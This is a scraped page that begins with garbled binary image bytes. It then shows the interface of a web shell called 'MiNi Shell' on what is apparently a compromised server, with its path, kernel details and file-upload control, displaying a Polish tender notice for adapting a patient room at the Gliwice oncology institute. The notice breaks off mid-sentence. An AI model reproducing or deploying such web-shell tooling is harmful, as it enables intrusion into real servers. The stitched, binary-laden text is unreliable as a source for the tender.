JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251017/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251017/0048194301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wyposażenie i adaptacja sali chorych w Centrum Wsparcia Badań Klinicznych Narodowego Instytutu Onkologii im. Marii Skłodowskiej-Curie – Państwowego Instytutu Badawczego Oddziału w Gliwicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Narodowy Instytut Onkologii im. Marii Skłodowskiej-Curie – Państwowy Instytut Badawczy Oddział w Gliwicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 00028836600028</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wybrzeże Armii Krajowej 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-102</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@gliwice.nio.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gliwice.nio.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyposażenie i adaptacja sali chorych w Centrum Wsparcia Badań Klinicznych Narodowego Instytutu Onkologii im. Marii Skłodowskiej-Curie – Państwowego Instytutu Badawczego Oddziału w Gliwicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a5a208cd-13f6-40b8-b3c3-15183b7c90d5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00481943</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Rozwój Centrum Wsparcia Badań Klinicznych Narodowego Instytutu Onkologii Oddziału w Gliwicach” finansowanego w ramach Krajowego Planu Odbudowy i Zwiększania Odporności w ramach umowy na dofinansowanie i realizację projektu nr KPOS.07.07-IW.07-0331/24” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a5a208cd-13f6-40b8-b3c3-15183b7c90d5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>Korzystanie z Platformy e Zamówienia jest bezpłatne. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację<br/>wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty<br/>elektronicznej na adres e-mail: przetargi@gliwice.nio.gov.pl (nie dotyczy składania ofert).Wielkość jednej wiadomości e-mail nie<br/>może przekraczać 100 MB</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na<br/>Platformie e- Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z<br/>Platformy e- Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl<br/>oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” na Platformie e-Zamówienia w pełnym zakresie wymaga<br/>posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z<br/>„Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest<br/>posiadanie tzw. konta uproszczonego na Platformie e Zamówienia.<br/>4. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>5. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>6. Pozostałe informacje zawarte są w Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, informuje się, że:<br/>1) Administratorem danych osobowych przetwarzanych w związku z prowadzeniem przez Narodowy Instytut Onkologii im. Marii<br/>Skłodowskiej-Curie – Państwowy Instytut Badawczy Oddział Gliwice, ul. Wybrzeże Armii Krajowej 15, 44-102 Gliwice postępowań o<br/>udzielenie zamówienia publicznego oraz następnie zawarciem i realizacją umów w sprawie zamówień publicznych jest Narodowy<br/>Instytut Onkologii im. Marii Skłodowskiej-Curie – Państwowy Instytut Badawczy ul. W.K. Roentgena 5, 02-781 Warszawa Oddział<br/>Gliwice, ul. Wybrzeże Armii Krajowej 15, 44-102 Gliwice<br/>2) Dane Kontaktowe Inspektora Ochrony Danych: Narodowy Instytut Onkologii im. Marii Skłodowskiej-Curie – Państwowy Instytut<br/>Badawczy Oddział Gliwice, ul. Wybrzeże Armii Krajowej 15, 44-102 Gliwice, tel. 32 278 91 85<br/>3) Wyżej określone dane osobowe przetwarzane są w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego<br/>oraz zawarcia i realizacji umowy w sprawie zamówienia publicznego ( art. 6 ust. 1b RODO).<br/>4) Odbiorcy danych: dane nie będą udostępniane podmiotom innym niż uprawnione na mocy przepisów prawa.<br/>5) Dane przechowywane będą przez okres niezbędny do przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz<br/>realizacji umowy w sprawie zamówienia publicznego, nie krócej niż do upływu okresu przedawnienia roszczeń wynikających z tej<br/>umowy.<br/>6) Osoby, których dane podlegają przetwarzaniu, posiadają prawo dostępu do treści swoich danych i ich sprostowania, usunięcia,<br/>ograniczenia przetwarzania, prawo do przenoszenia danych, w przypadku udzielenie zgody na przetwarzanie przysługuje prawo do<br/>cofnięcia zgody w dowolnym momencie bez wpływu na zgodność z prawem przetwarzania, a także wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych (PUODO) w przypadku uznania, że przetwarzanie danych narusza przepisy dotyczące ochrony danych<br/>osobowych.<br/>7) Podanie danych jest dobrowolne, jednak niezbędne w celu udziału postępowaniu o udzielenie zamówienia publicznego oraz<br/>następnie w celu zawarcia i realizacji umowy w sprawie zamówienia publicznego. Konsekwencją nie podania danych jest brak<br/>możliwości udziału w postępowaniu oraz zawarcia i realizacji umowy w sprawie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZ/DZ-TPzmn-381-2-79/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 130085,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest wyposażenie i adaptacja sali chorych <br/>w Centrum Wsparcia Badań Klinicznych Narodowego Instytutu Onkologii im. Marii Skłodowskiej-Curie – Państwowego Instytutu Badawczego Oddziału w Gliwicach, zwanego dalej Zamawiającym.<br/>2.	Opis przedmiotu zamówienia oraz warunki realizacji zamówienia zawarte <br/>są w załącznikach:<br/>1)	Program funkcjonalno-użytkowy<br/>2)	Projektowane postanowienia umowy, które zostaną wprowadzone do treści umowy( PPU)– załącznik nr 5 do SWZ <br/>3.	Zamawiający nie dopuszcza możliwość składania ofert częściowych.<br/>Uzasadnienie:<br/>Przedmiotem zamówienia jest wyposażenie i adaptacja jednej sali chorych <br/>w Centrum Wsparcia Badań Klinicznych, a zatem ze względów technologicznych, wykonawczych oraz racjonalnego wydatkowania środków publicznych podział zamówienia <br/>na części jest w tym przypadku nieuzasadniony. Zagroziłoby to nadmiernymi trudnościami technicznymi i kosztami wykonania zamówienia, a także potrzebą skoordynowania działań różnych Wykonawców realizujących poszczególne części zadania. Podział przed-miotu zamówienia na mniejsze części nie ma żadnego uzasadnienia zarówno ekonomicznego jaki i organizacyjnego na etapie realizacji zamówienia/umowy.<br/>Podział zamówienia na części ma na celu zwiększenie efektywności wydatkowania środków publicznych poprzez ułatwienie w szczególności udziału małych i średnich przedsiębiorstw (MŚP) w postępowaniu. Zakres przedmiotu zamówienia jest całkowicie <br/>przystępny dla MŚP, a brak podziału przedmiotowego zamówienia na części nie utrudnia im w żaden sposób dostępu do zamówienia.<br/>4. Przedmiot umowy realizowany będzie ze środków projektu pn. „Rozwój Centrum Wsparcia Badań Klinicznych Narodowego Instytutu Onkologii Oddziału w Gliwicach” <br/>finansowanego w ramach Krajowego Planu Odbudowy i Zwiększania Odporności w ramach umowy na dofinansowanie i realizację projektu nr KPOS.07.07-IW.07-0331/24”<br/>5. Termin wykonania przedmiotu zamówienia:<br/>84 dni kalendarzowych zgodnie z terminami i zasadami określonymi w projektowanych postanowień umowy- załączniki 5 do SWZ.<br/>1)	zakres prac określony w §1 ust. 1 pkt. 1 projektowanych postaniwień <br/>umownych- do 28 dni kalendarzowych licząc od dnia zawarcia umowy,<br/>2)	zakres prac określony w §1 ust. 1 pkt. 2-5 projektowanych postaniwień <br/>umownych - do 56 dni kalendarzowych licząc od dnia przekazania placu budo-wy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45215100-8 - Roboty budowlane w zakresie budowy placówek zdrowotnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">31000000-6 - Maszyny, aparatura, urządzenia i wyroby elektryczne; oświetlenie</p> <p class="mb-0">32410000-0 - Lokalna sieć komputerowa</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">32421000-0 - Okablowanie sieciowe</p> <p class="mb-0">32422000-7 - Elementy składowe sieci</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">33100000-1 - Urządzenia medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie oferta nie podlegająca odrzuceniu z<br/>najniższą ceną (brutto). Oferty zostaną sklasyfikowane wg kolejności zaoferowanej ceny (brutto) od najniższej (najkorzystniejsza) do<br/>najwyższej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dotyczący zdolność technicznej lub zawodowej:<br/>1.	Wykonawca spełni warunek, jeżeli w okresie ostatnich 5 lat przed upływem <br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie wykonał należycie dwie roboty budowlane, polegające <br/>na wykonaniu przebudowy lub remontu pomieszczeń w obiektach użyteczności publicznej o łącznej wartości nie mniejszej niż 120 000,00 zł brutto i które <br/>polegały na realizacji: robót ogólnobudowlanych, robót elektrycznych, robót <br/>sanitarnych w tym certyfikowanej instalacji gazów medycznych.<br/><br/>W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunków udziału <br/>w postępowaniu w zakresie określonym powyżej przedstawi dokumenty <br/>zawierające kwoty wyrażone w walutach innych niż złoty polski, ma obowiązek przeliczyć je na PLN. Do przeliczenia należy zastosować średni kurs walut NBP <br/>obowiązujący w dniu:<br/>- zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia, w przypadku, gdy umowa trwa nadal należy przyjąć aktualną datę, w której nastąpiło spełnienie lub przekroczenie wartości, o której mowa <br/>w warunku udziału w postępowaniu;<br/>- w przypadku braku publikacji kursów walut NBP obowiązujących w dniach, <br/>o których mowa powyżej, zastosowanie mają kursy ostatnio ogłoszone, przed <br/>ww. dniami zgodnie z treścią §8 pkt 5 Uchwały nr 51/2002 Zarządu Narodowego Banku Polskiego z dnia 23 września 2002 r. – W sprawie sposobu wyliczania <br/>i ogłaszania bieżących kursów walut obcych (t.j. Dz. Urz. NBP z 2023r. poz. 1).<br/><br/>2.	Wykonawca spełni warunek jeżeli wykaże, że dysponuje (lub będzie dysponował) następującymi osobami niezbędnymi do wykonania niniejszego zamówienia:<br/>1)	kierownikiem budowy spełniającym łącznie następujące wymagania:<br/>a)	posiadającym uprawnienia do pełnienia samodzielnych funkcji <br/>technicznych w budownictwie zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2025 poz. 418 ze zm.)<br/>b)	posiadającym aktualny wpis na listę członków właściwej izby samorządu <br/>zawodowego,<br/>c)	posiadającym uprawnienia budowlane do kierowania robotami <br/>budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń,<br/>d)	posiadającym co najmniej 5-letnie doświadczenie, licząc od daty uzyskania stosownych uprawnień budowalnych, w kierowaniu robotami <br/>budowalnymi w specjalności konstrukcyjno-budowlanej bez ograniczeń <br/>w funkcji kierownika budowy,<br/>e)	posiadającym doświadczenie w pełnieniu funkcji kierownika budowy <br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, przy <br/>co najmniej 1 robocie budowalnej polegającej na wykonaniu budowy<br/> lub przebudowy lub rozbudowy budynku szpitalnego (wg Polskiej <br/>Klasyfikacji Obiektów Budowlanych należących do klasy 1264) <br/><br/>2)	projektantem w specjalności architektonicznej spełniającym łącznie <br/>następujące wymagania:<br/>a)	posiadającym wykształcenie wyższe o kierunku technicznym,<br/>b)	posiadającym doświadczenie polegające na pełnieniu funkcji projektanta <br/>w specjalności architektonicznej w co najmniej 1 projekcie dotyczącym <br/>budowy lub przebudowy lub rozbudowy budynku szpitalnego (wg Polskiej Klasyfikacji Obiektów Budowlanych należących do klasy 1264) <br/>c)	posiadającym uprawnienia budowlane do projektowania w specjalności <br/>architektonicznej bez ograniczeń, które zostały wydane na podstawie usta-wy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2025 poz. 418 <br/>ze zm.) (lub odpowiadające im równoważne uprawnienia budowlane),<br/>d)	posiadającym aktualny na dzień składania ofert wpis na listę członków <br/>właściwej okręgowej Izby Samorządu Zawodowego (IARP), potwierdzony zaświadczeniem wydanym przez tę Izbę, zgodnie z przepisami prawa.<br/><br/>3)	projektantem w specjalności konstrukcyjnej spełniającym łącznie następujące wymagania:<br/>a)	posiadającym wykształcenie wyższe o kierunku technicznym,<br/>b)	posiadającym uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, które zostały wydane <br/>na podstawie ustawy z dnia 7 lipca 1994 r. - Prawo budowlane <br/>(Dz. U. z 2025 poz. 418 ze zm.) (lub odpowiadające im równoważne uprawnienia budowlane),<br/>c)	posiadającym aktualny na dzień składania ofert wpis na listę członków <br/>właściwej okręgowej Izby Samorządu Zawodowego (IARP lub PIIB), <br/>potwierdzony zaświadczeniem wydanym przez tę Izbę, zgodnie <br/>z przepisami prawa,<br/><br/>4)	projektantem w specjalności sanitarnej spełniającym łącznie następujące <br/>wymagania:<br/>a)	posiadającym wykształcenie wyższe o kierunku technicznym,<br/>b)	posiadającym uprawnienia budowlane do projektowania w specjalności <br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyj-nych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, które zostały wydane na podstawie ustawy z dnia 7 lipca 1994 r. - Prawo <br/>budowlane (Dz. U. z 2025 poz. 418 ze zm.) (lub odpowiadające <br/>im równoważne uprawnienia budowlane),<br/>c)	posiadającym aktualny na dzień składania ofert wpis na listę członków <br/>właściwej okręgowej Izby Samorządu Zawodowego (IARP lub PIIB), <br/>potwierdzony zaświadczeniem wydanym przez tę Izbę, zgodnie <br/>z przepisami prawa,<br/>5)	projektantem w specjalności elektrycznej spełniającym łącznie następujące wymagania:<br/>a)	posiadającym wykształcenie wyższe o kierunku technicznym,<br/>b)	posiadającym uprawnienia budowlane do projektowania w specjalności <br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych <br/>i elektroenergetycznych bez ograniczeń, które zostały wydane na podstawie ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2025 poz. 418 ze zm.) (lub odpowiadające im równoważne uprawnienia budowlane),<br/>c)	posiadającym aktualny na dzień składania ofert wpis na listę członków <br/>właściwej okręgowej Izby Samorządu Zawodowego (IARP lub PIIB), <br/>potwierdzony zaświadczeniem wydanym przez tę Izbę, zgodnie <br/>z przepisami prawa.<br/>3. Zamawiający nie dopuszcza możliwości łączenia przez jedną osobę kilku funkcji (kompetencji), o których mowa w pkt. 2 powyżej.<br/>4.	Zamawiający, określając wymogi dla osób wymienionych w pkt. 2 w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz 